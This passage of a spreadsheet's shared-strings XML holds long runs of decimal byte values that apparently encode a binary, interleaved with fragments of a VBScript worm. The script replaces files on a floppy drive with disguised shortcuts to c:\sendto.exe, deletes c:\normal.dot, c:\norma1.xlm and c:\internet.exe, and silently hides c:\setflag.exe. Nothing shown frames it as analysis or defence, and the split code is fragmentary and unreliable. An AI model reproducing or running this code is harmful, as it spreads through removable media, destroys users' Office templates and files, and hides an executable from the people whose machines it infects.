66 230 133 114 234 198 106 36 153 243 82 95 170 213 39 209 106 254 54 149 252 180 150 145 184 71 173 30 100 159 3 178 207 117 65 167 243 65 23 25 225 181 9 57 34 235 72 79 67 195 115 208 240 18 52 220 138 85 138 191 192 184 17 190 45 58 53 183 119 3 249 233 245 251 180 145 172 34 155 40 202 41 200 12 166 77 10 205 76 196 30 184 7 4 152 62 1 113 120 3 13 36 114 82 165 151 67 216 188 18 24 166 245 200 157 205 75 16 139 213 76 244 112 162 44 129 120 38 179 30 240 109 237 151 193 140 161 176 42 15 65 202 104 176 20 37 222 130 74 126 99 8 96 192 74 3 97 160 164 165 216 9 122 25 237 144 208 0 139 84 80 66 172 192 29 105 12 213 95 65 43 209 169 210 84 48 198 123 90 72 25 44 72 58 212 163 117 140 2 3 22 113 242 163 218 244 242 169 81 15 29 219 3 216 101 77 143 153 153 16 91 95 141 162 225 188 29 124 204 171 16 18 221 129 17 162 47 0 48 29 136 69 96 108 155 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">33 24 253 14 32 54 22 224 56 23 202 254 8 231 63 225 188 7 98 234 227 0 252 183 1 118 251 160 238 87 192 230 249 206 116 193 156 46 172 101 133 44 172 69 171 7 6 103 55 56 44 63 216 143 97 214 2 60 227 6 195 61 147 240 226 58 94 123 138 129 163 147 137 37 215 221 201 252 176 27 240 248 96 231 205 147 121 101 5 153 165 132 62 148 208 83 200 177 142 80 94 111 245 178 137 36 60 15 97 226 85 181 120 58 16 25 88 150 95 66 74 191 65 142 121 76 67 36 94 216 179 195 212 0 255 52 177 16 206 54 72 77 101 10 96 8 182 146 141 232 241 15 218 166 41 219 187 143 36 155 216 227 232 180 128 177 64 62 34 11 237 170 200 126 204 89 230 80 68 108 38 163 86 129 131 94 31 157 174 113 2 47 81 204 108 181 154 172 175 49 100 217 156 35 91 239 7 94 85 241 124 62 170 167 228 191 19 105 100 166 22 32 43 43 113 226 52 240 46 35 77 169 169 168 192 98 69 35 185 39 74 70 50 105 204 22 213 210 136 234 77 220 234 99 249 189 102 116 91 122 237 198 184 138 67 67 163 133 1 245 43 139 209 214 95 234 127 250 161 228 61 102 0 58 220 20 153 243 249 90 235 148 168 169 189 101 75 157 105 190 107 103 180 253 139 147 217 167 50 106 187 205 251 166 49 245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 